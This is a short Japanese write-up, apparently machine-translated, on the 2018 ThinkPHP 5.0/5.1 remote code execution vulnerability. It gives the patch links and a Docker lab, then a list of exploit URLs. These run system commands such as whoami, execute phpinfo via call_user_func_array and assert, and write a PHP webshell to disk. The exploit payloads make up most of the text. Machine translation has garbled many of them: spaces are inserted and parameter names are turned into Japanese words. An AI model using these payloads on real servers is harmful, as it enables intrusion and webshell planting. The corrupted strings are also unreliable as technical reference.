ThinkPHP公式2018年12月9日には、重要なリリースされたセキュリティ更新プログラムを、深刻なリモートでコードが実行される脆弱性を修正します。更新は主に十分なテストを行わずにフレームコントローラ名はバージョン5.0と5.1を含む必須のルーティングgetshell脆弱性、影響を受けるバージョンの非存在下での可能な順番につながる可能性があるため、セキュリティ更新プログラムに関連する、できるだけ早く最新バージョンにアップデートすることが推奨されます。
主な理由は、「\」エラー
パッチ:
Thinkphp v5.0.xパッチ住所: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f
Thinkphp v5.1.xパッチ住所: https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815
環境住所:
ドッキングウィンドウ環境の脆弱性出典:https://github.com/vulnspy/thinkphp-5.1.29
開発します
1.リモートコマンド実行EXP:
http:// localhostを:?9096 /公共/ index.phpをS =インデックス/だと思う\アプリ/ invokefunction&機能= call_user_func_array&VARS [0] =システム&VARS [1] [] =にwhoami
2.リモートでコードが実行されます
HTTP:// localhostを:?9096 /公共/ index.phpをのS =インデックス/考える\アプリケーション/ invokeFunction&機能= call_user_func_arrayの\&VARS [0] =のphpinfo&VARS [1] [] = 1つの#のコード実行のphpinfo() HTTP:// 127.0。 ?? 0.1 / index.phpをS =インデックス / \要求/入力データは[] =のphpinfo(思う)&フィルタ=#1 5.1.xのアサートバージョン実行するphpinfo() HTTP:// 127.0.0.1/index.php?s=indexを/ \ \コンテナ/ invokefunction&だと思う機能= call_user_func_array&VARS [0] =のphpinfo&VARS [1] [] = 1つの#5.1.xののバージョンの HTTP:// [127.0.0.1/index.php?s=index/think\app/invokefunction&function=call_user_func_array&varsを0] =アサート&VARS [1 ] [] =のphpinfo()#の5.0.xののバージョン
3.写シェル
http:// 127.0.0.1/index.php?s=index/\think\template\driver\file/write?cacheFile=shell.php&content = <?PHPの%の20phpinfo();?>
?のhttp:// localhostを:9096 /公共/ index.phpをS =インデックス/だと思う\アプリ/ invokefunction&機能= call_user_func_array VARS [0] =システム&VARS&[1] [] =エコー "<?PHPのするphpinfo();?>" >> 2.php